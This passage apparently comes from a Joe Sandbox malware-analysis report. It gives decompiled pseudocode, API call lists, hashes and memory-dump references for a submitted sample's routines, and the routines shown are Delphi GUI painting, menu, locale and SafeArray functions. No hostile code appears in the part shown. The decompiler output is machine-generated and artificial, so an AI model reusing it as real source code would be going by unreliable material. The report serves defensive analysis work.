                                  					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x430886, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
                                  					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
                                  					_push(_v104);
                                  					_push(0);
                                  					_push(0);
                                  					L00405FA8();
                                  					EndPaint(E004325A4(_t83),  &_v80);
                                  					_t102 = _t55;
                                  					 *[fs:eax] = _t102;
                                  					_push(0x43088d);
                                  					SelectObject(_v8, _v16);
                                  					DeleteDC(_v8);
                                  					return DeleteObject(_v12);
                                  				}
                                  			}

























                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0043077F
                                  • 72E7A520.GDI32(00000000,?), ref: 004307A3
                                  • 72E7B380.USER32(00000000,00000000,00000000,?), ref: 004307AE
                                  • 72E7A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 004307B5
                                  • SelectObject.GDI32(00000000,?), ref: 004307C5
                                  • BeginPaint.USER32(00000000,?,00000000,00430886,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004307E7
                                  • 72E897E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00430843
                                  • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00430854
                                  • SelectObject.GDI32(00000000,?), ref: 0043086E
                                  • DeleteDC.GDI32(00000000), ref: 00430877
                                  • DeleteObject.GDI32(?), ref: 00430880
                                    • Part of subcall function 00430258: BeginPaint.USER32(00000000,?), ref: 0043027E
                                    • Part of subcall function 00430258: EndPaint.USER32(00000000,?,0043037F), ref: 00430372
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Paint$Object$BeginDeleteSelect$A520A590B380E897
                                  • String ID:
                                  • API String ID: 3782911080-0
                                  • Opcode ID: 56195f3e972268beac2185bc498dc5b09f12682e3a3bb39b51d8af3145d6b67f
                                  • Instruction ID: 4b093a1ebe963f4d8922688ddba499105a4c7b73df9a186bd078be7a66176fe1
                                  • Opcode Fuzzy Hash: 56195f3e972268beac2185bc498dc5b09f12682e3a3bb39b51d8af3145d6b67f
                                  • Instruction Fuzzy Hash: 56415E71B00204AFD710EFA9CD85F9EB7F8AF48704F10457AB505EB281DA78ED058B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004303B0(void* __eax, void* __ecx, struct HDC__* __edx) {
                                  				struct tagRECT _v44;
                                  				struct tagRECT _v60;
                                  				void* _v68;
                                  				int _v80;
                                  				int _t79;
                                  				void* _t134;
                                  				int _t135;
                                  				void* _t136;
                                  				void* _t159;
                                  				void* _t160;
                                  				void* _t161;
                                  				struct HDC__* _t162;
                                  				intOrPtr* _t163;
                                  
                                  				_t163 =  &(_v44.bottom);
                                  				_t134 = __ecx;
                                  				_t162 = __edx;
                                  				_t161 = __eax;
                                  				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
                                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
                                  				}
                                  				_t78 =  *((intOrPtr*)(_t161 + 0x198));
                                  				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
                                  					L17:
                                  					_t79 =  *(_t161 + 0x19c);
                                  					if(_t79 == 0) {
                                  						L27:
                                  						return _t79;
                                  					}
                                  					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
                                  					if(_t79 < 0) {
                                  						goto L27;
                                  					}
                                  					_v44.right = _t79 + 1;
                                  					_t159 = 0;
                                  					do {
                                  						_t79 = E00413524( *(_t161 + 0x19c), _t159);
                                  						_t135 = _t79;
                                  						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
                                  							_v44.left = CreateSolidBrush(E0041BA40(0xff000010));
                                  							E004120F0( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
                                  							FrameRect(_t162,  &_v44, _v44);
                                  							DeleteObject(_v60.right);
                                  							_v60.left = CreateSolidBrush(E0041BA40(0xff000014));
                                  							E004120F0( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
                                  							FrameRect(_t162,  &_v60, _v60);
                                  							_t79 = DeleteObject(_v68);
                                  						}
                                  						_t159 = _t159 + 1;
                                  						_t75 =  &(_v44.right);
                                  						 *_t75 = _v44.right - 1;
                                  					} while ( *_t75 != 0);
                                  					goto L27;
                                  				}
                                  				_t160 = 0;
                                  				if(_t134 != 0) {
                                  					_t160 = E00413580(_t78, _t134);
                                  					if(_t160 < 0) {
                                  						_t160 = 0;
                                  					}
                                  				}
                                  				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
                                  				if(_t160 <  *_t163) {
                                  					do {
                                  						_t136 = E00413524( *((intOrPtr*)(_t161 + 0x198)), _t160);
                                  						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
                                  							E004120F0( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
                                  							if(RectVisible(_t162,  &(_v44.top)) != 0) {
                                  								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
                                  									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
                                  								}
                                  								_v60.top = SaveDC(_t162);
                                  								E0042A82C(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
                                  								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
                                  								E0042D05C(_t136, _t162, 0xf, 0);
                                  								RestoreDC(_t162, _v80);
                                  								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
                                  							}
                                  						}
                                  						_t160 = _t160 + 1;
                                  					} while (_t160 < _v60.top);
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                  • String ID:
                                  • API String ID: 375863564-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00446A84(intOrPtr _a4) {
                                  				intOrPtr _t27;
                                  				struct HMENU__* _t48;
                                  
                                  				_t27 =  *((intOrPtr*)(_a4 - 4));
                                  				if( *((char*)(_t27 + 0x229)) != 0) {
                                  					_t27 =  *((intOrPtr*)(_a4 - 4));
                                  					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
                                  						_t27 =  *((intOrPtr*)(_a4 - 4));
                                  						if( *((char*)(_t27 + 0x22f)) != 1) {
                                  							_t48 = GetSystemMenu(E004325A4( *((intOrPtr*)(_a4 - 4))), 0);
                                  							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
                                  								DeleteMenu(_t48, 0xf130, 0);
                                  								DeleteMenu(_t48, 7, 0x400);
                                  								DeleteMenu(_t48, 5, 0x400);
                                  								DeleteMenu(_t48, 0xf030, 0);
                                  								DeleteMenu(_t48, 0xf020, 0);
                                  								DeleteMenu(_t48, 0xf000, 0);
                                  								return DeleteMenu(_t48, 0xf120, 0);
                                  							}
                                  							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
                                  								EnableMenuItem(_t48, 0xf020, 1);
                                  							}
                                  							_t27 =  *((intOrPtr*)(_a4 - 4));
                                  							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
                                  								return EnableMenuItem(_t48, 0xf030, 1);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t27;
                                  			}

                                  APIs
                                  • GetSystemMenu.USER32(00000000,00000000), ref: 00446ACF
                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00446AED
                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00446AFA
                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00446B07
                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00446B14
                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00446B21
                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00446B2E
                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00446B3B
                                  • EnableMenuItem.USER32 ref: 00446B59
                                  • EnableMenuItem.USER32 ref: 00446B75
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$EnableItem$System
                                  • String ID:
                                  • API String ID: 3985193851-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042BAFC(intOrPtr* __eax, int __ecx, int __edx) {
                                  				char _t62;
                                  				signed int _t64;
                                  				signed int _t65;
                                  				signed char _t107;
                                  				intOrPtr _t113;
                                  				intOrPtr _t114;
                                  				int _t117;
                                  				intOrPtr* _t118;
                                  				int _t119;
                                  				int* _t121;
                                  
                                  				 *_t121 = __ecx;
                                  				_t117 = __edx;
                                  				_t118 = __eax;
                                  				if(__edx ==  *_t121) {
                                  					L29:
                                  					_t62 =  *0x42bca8; // 0x0
                                  					 *((char*)(_t118 + 0x98)) = _t62;
                                  					return _t62;
                                  				}
                                  				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                                  					_t107 =  *0x42bca0; // 0x1f
                                  				} else {
                                  					_t107 =  *((intOrPtr*)(__eax + 0x98));
                                  				}
                                  				if((_t107 & 0x00000001) == 0) {
                                  					_t119 =  *(_t118 + 0x40);
                                  				} else {
                                  					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
                                  				}
                                  				if((_t107 & 0x00000002) == 0) {
                                  					_t121[1] =  *(_t118 + 0x44);
                                  				} else {
                                  					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                  				}
                                  				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
                                  					_t64 =  *(_t118 + 0x48);
                                  					_t121[2] = _t64;
                                  				} else {
                                  					if((_t107 & 0x00000001) == 0) {
                                  						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
                                  						_t121[2] = _t64;
                                  					} else {
                                  						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
                                  						_t121[2] = _t64;
                                  					}
                                  				}
                                  				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
                                  				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
                                  					_t121[3] =  *(_t118 + 0x4c);
                                  				} else {
                                  					if(_t65 == 0) {
                                  						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                  					} else {
                                  						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
                                  					}
                                  				}
                                  				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
                                  				_t113 =  *0x42bca8; // 0x0
                                  				if(_t113 != (_t107 &  *0x42bca4)) {
                                  					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
                                  				}
                                  				_t114 =  *0x42bca8; // 0x0
                                  				if(_t114 != (_t107 &  *0x42bcac)) {
                                  					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
                                  				}
                                  				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
                                  					E0041C1A0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041C184( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
                                  				}
                                  				goto L29;
                                  			}

                                  APIs
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042BB35
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042BB4F
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042BB7D
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042BB93
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042BBCB
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042BBE3
                                  • MulDiv.KERNEL32(?,?,0000001F), ref: 0042BC2D
                                  • MulDiv.KERNEL32(?,?,0000001F), ref: 0042BC56
                                  • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0042BC7C
                                    • Part of subcall function 0041C1A0: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041C1AD
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0042C964(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				char _v5;
                                  				struct HDC__* _v12;
                                  				struct HDC__* _v16;
                                  				void* _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				int _v32;
                                  				int _v36;
                                  				struct HDC__* _t33;
                                  				intOrPtr _t72;
                                  				int _t74;
                                  				intOrPtr _t80;
                                  				int _t83;
                                  				void* _t88;
                                  				int _t89;
                                  				void* _t92;
                                  				void* _t93;
                                  				intOrPtr _t94;
                                  
                                  				_t92 = _t93;
                                  				_t94 = _t93 + 0xffffffe0;
                                  				_v5 = __ecx;
                                  				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
                                  				if(_v5 == 0) {
                                  					_push(__edx);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_pop(_t88);
                                  				} else {
                                  					_push(__edx);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_pop(_t88);
                                  				}
                                  				_v12 = GetDesktopWindow();
                                  				_push(0x402);
                                  				_push(0);
                                  				_t33 = _v12;
                                  				_push(_t33);
                                  				L004062C8();
                                  				_v16 = _t33;
                                  				_push(_t92);
                                  				_push(0x42ca7f);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t94;
                                  				_v20 = SelectObject(_v16, E0041C700( *((intOrPtr*)(_t88 + 0x40))));
                                  				_t89 = _v36;
                                  				_t83 = _v32;
                                  				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
                                  				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
                                  				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
                                  				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
                                  				SelectObject(_v16, _v20);
                                  				_pop(_t80);
                                  				 *[fs:eax] = _t80;
                                  				_push(0x42ca86);
                                  				_push(_v16);
                                  				_t72 = _v12;
                                  				_push(_t72);
                                  				L004064F8();
                                  				return _t72;
                                  			}

                                  APIs
                                  • GetDesktopWindow.USER32 ref: 0042C99B
                                  • 72E7ACE0.USER32(?,00000000,00000402), ref: 0042C9AE
                                  • SelectObject.GDI32(?,00000000), ref: 0042C9D1
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0042C9F7
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0042CA19
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0042CA38
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0042CA52
                                  • SelectObject.GDI32(?,?), ref: 0042CA5F
                                  • 72E7B380.USER32(?,?,0042CA86,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 0042CA79
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$B380DesktopWindow
                                  • String ID:
                                  • API String ID: 989747725-0
                                  • Opcode ID: a83d088e72a52128b009d9036d34a78b96bb67b0bf4aef052cd2ecbbfa9612b5
                                  • Instruction ID: cd7691b0c40c7a7f6e41b86910b11e04a66da0acd20f1ea4494e156cc043563a
                                  • Opcode Fuzzy Hash: a83d088e72a52128b009d9036d34a78b96bb67b0bf4aef052cd2ecbbfa9612b5
                                  • Instruction Fuzzy Hash: 9C311CB6A00219AFDB00DEEDCC85EAFBBBCEF09714B414569B505F7280C679AD048B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E0040C074(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v48;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v68;
                                  				void* _t104;
                                  				void* _t111;
                                  				void* _t133;
                                  				intOrPtr _t183;
                                  				intOrPtr _t193;
                                  				intOrPtr _t194;
                                  
                                  				_t191 = __esi;
                                  				_t190 = __edi;
                                  				_t193 = _t194;
                                  				_t133 = 8;
                                  				do {
                                  					_push(0);
                                  					_push(0);
                                  					_t133 = _t133 - 1;
                                  				} while (_t133 != 0);
                                  				_push(__ebx);
                                  				_push(_t193);
                                  				_push(0x40c33f);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t194;
                                  				E0040BF00();
                                  				E0040A964(__ebx, __edi, __esi);
                                  				_t196 =  *0x44f74c;
                                  				if( *0x44f74c != 0) {
                                  					E0040AB3C(__esi, _t196);
                                  				}
                                  				_t132 = GetThreadLocale();
                                  				E0040A8B4(_t43, 0, 0x14,  &_v20);
                                  				E00403E64(0x44f680, _v20);
                                  				E0040A8B4(_t43, 0x40c354, 0x1b,  &_v24);
                                  				 *0x44f684 = E00407CB8(0x40c354, 0, _t196);
                                  				E0040A8B4(_t132, 0x40c354, 0x1c,  &_v28);
                                  				 *0x44f685 = E00407CB8(0x40c354, 0, _t196);
                                  				 *0x44f686 = E0040A900(_t132, 0x2c, 0xf);
                                  				 *0x44f687 = E0040A900(_t132, 0x2e, 0xe);
                                  				E0040A8B4(_t132, 0x40c354, 0x19,  &_v32);
                                  				 *0x44f688 = E00407CB8(0x40c354, 0, _t196);
                                  				 *0x44f689 = E0040A900(_t132, 0x2f, 0x1d);
                                  				E0040A8B4(_t132, "m/d/yy", 0x1f,  &_v40);
                                  				E0040ABEC(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                  				E00403E64(0x44f68c, _v36);
                                  				E0040A8B4(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                  				E0040ABEC(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                  				E00403E64(0x44f690, _v44);
                                  				 *0x44f694 = E0040A900(_t132, 0x3a, 0x1e);
                                  				E0040A8B4(_t132, 0x40c388, 0x28,  &_v52);
                                  				E00403E64(0x44f698, _v52);
                                  				E0040A8B4(_t132, 0x40c394, 0x29,  &_v56);
                                  				E00403E64(0x44f69c, _v56);
                                  				E00403E10( &_v12);
                                  				E00403E10( &_v16);
                                  				E0040A8B4(_t132, 0x40c354, 0x25,  &_v60);
                                  				_t104 = E00407CB8(0x40c354, 0, _t196);
                                  				_t197 = _t104;
                                  				if(_t104 != 0) {
                                  					E00403EA8( &_v8, 0x40c3ac);
                                  				} else {
                                  					E00403EA8( &_v8, 0x40c3a0);
                                  				}
                                  				E0040A8B4(_t132, 0x40c354, 0x23,  &_v64);
                                  				_t111 = E00407CB8(0x40c354, 0, _t197);
                                  				_t198 = _t111;
                                  				if(_t111 == 0) {
                                  					E0040A8B4(_t132, 0x40c354, 0x1005,  &_v68);
                                  					if(E00407CB8(0x40c354, 0, _t198) != 0) {
                                  						E00403EA8( &_v12, 0x40c3c8);
                                  					} else {
                                  						E00403EA8( &_v16, 0x40c3b8);
                                  					}
                                  				}
                                  				_push(_v12);
                                  				_push(_v8);
                                  				_push(":mm");
                                  				_push(_v16);
                                  				E00404190();
                                  				_push(_v12);
                                  				_push(_v8);
                                  				_push(":mm:ss");
                                  				_push(_v16);
                                  				E00404190();
                                  				 *0x44f74e = E0040A900(_t132, 0x2c, 0xc);
                                  				_pop(_t183);
                                  				 *[fs:eax] = _t183;
                                  				_push(E0040C346);
                                  				return E00403E34( &_v68, 0x10);
                                  			}

                                  APIs
                                  • GetThreadLocale.KERNEL32(00000000,0040C33F,?,?,00000000,00000000), ref: 0040C0AA
                                    • Part of subcall function 0040A8B4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040A8D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                  • API String ID: 4232894706-2493093252
                                  • Opcode ID: 0477bcef38faec6503c5203299fd22ab8c88ccbb6e6ec78dd3f49002848c6e87
                                  • Instruction ID: 994eb837987e28fbe0c85b07198a4924c8e0c4b2f4f6dcdf4059e1e6393e2f0f
                                  • Opcode Fuzzy Hash: 0477bcef38faec6503c5203299fd22ab8c88ccbb6e6ec78dd3f49002848c6e87
                                  • Instruction Fuzzy Hash: CB615235B102489BDB00FBB5C881A9E77BA9B48304F51C53BB501BB7D6CA3CDD1A8799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E0040E5A0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                  				char _v260;
                                  				char _v768;
                                  				char _v772;
                                  				short* _v776;
                                  				intOrPtr _v780;
                                  				char _v784;
                                  				signed int _v788;
                                  				signed short* _v792;
                                  				char _v796;
                                  				char _v800;
                                  				intOrPtr* _v804;
                                  				void* __ebp;
                                  				signed char _t47;
                                  				signed int _t54;
                                  				void* _t62;
                                  				intOrPtr* _t73;
                                  				intOrPtr* _t91;
                                  				void* _t93;
                                  				void* _t95;
                                  				void* _t98;
                                  				void* _t99;
                                  				intOrPtr* _t108;
                                  				void* _t112;
                                  				intOrPtr _t113;
                                  				char* _t114;
                                  				void* _t115;
                                  
                                  				_t100 = __ecx;
                                  				_v780 = __ecx;
                                  				_t91 = __edx;
                                  				_v776 = __eax;
                                  				if(( *(__edx + 1) & 0x00000020) == 0) {
                                  					E0040E1CC(0x80070057);
                                  				}
                                  				_t47 =  *_t91;
                                  				if((_t47 & 0x00000fff) != 0xc) {
                                  					_push(_t91);
                                  					_push(_v776);
                                  					L0040CF80();
                                  					return E0040E1CC(_v776);
                                  				} else {
                                  					if((_t47 & 0x00000040) == 0) {
                                  						_v792 =  *((intOrPtr*)(_t91 + 8));
                                  					} else {
                                  						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                                  					}
                                  					_v788 =  *_v792 & 0x0000ffff;
                                  					_t93 = _v788 - 1;
                                  					if(_t93 < 0) {
                                  						L9:
                                  						_push( &_v772);
                                  						_t54 = _v788;
                                  						_push(_t54);
                                  						_push(0xc);
                                  						L0040D3D4();
                                  						_t113 = _t54;
                                  						if(_t113 == 0) {
                                  							E0040DF24(_t100);
                                  						}
                                  						E0040E4F8(_v776);
                                  						 *_v776 = 0x200c;
                                  						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                  						_t95 = _v788 - 1;
                                  						if(_t95 < 0) {
                                  							L14:
                                  							_t97 = _v788 - 1;
                                  							if(E0040E514(_v788 - 1, _t115) != 0) {
                                  								L0040D3EC();
                                  								E0040E1CC(_v792);
                                  								L0040D3EC();
                                  								E0040E1CC( &_v260);
                                  								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                  							}
                                  							_t62 = E0040E544(_t97, _t115);
                                  						} else {
                                  							_t98 = _t95 + 1;
                                  							_t73 =  &_v768;
                                  							_t108 =  &_v260;
                                  							do {
                                  								 *_t108 =  *_t73;
                                  								_t108 = _t108 + 4;
                                  								_t73 = _t73 + 8;
                                  								_t98 = _t98 - 1;
                                  							} while (_t98 != 0);
                                  							do {
                                  								goto L14;
                                  							} while (_t62 != 0);
                                  							return _t62;
                                  						}
                                  					} else {
                                  						_t99 = _t93 + 1;
                                  						_t112 = 0;
                                  						_t114 =  &_v772;
                                  						do {
                                  							_v804 = _t114;
                                  							_push(_v804 + 4);
                                  							_t18 = _t112 + 1; // 0x1
                                  							_push(_v792);
                                  							L0040D3DC();
                                  							E0040E1CC(_v792);
                                  							_push( &_v784);
                                  							_t21 = _t112 + 1; // 0x1
                                  							_push(_v792);
                                  							L0040D3E4();
                                  							E0040E1CC(_v792);
                                  							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                  							_t112 = _t112 + 1;
                                  							_t114 = _t114 + 8;
                                  							_t99 = _t99 - 1;
                                  						} while (_t99 != 0);
                                  						goto L9;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040E639
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040E655
                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040E68E
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040E70B
                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040E724
                                  • VariantCopy.OLEAUT32(?), ref: 0040E759
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
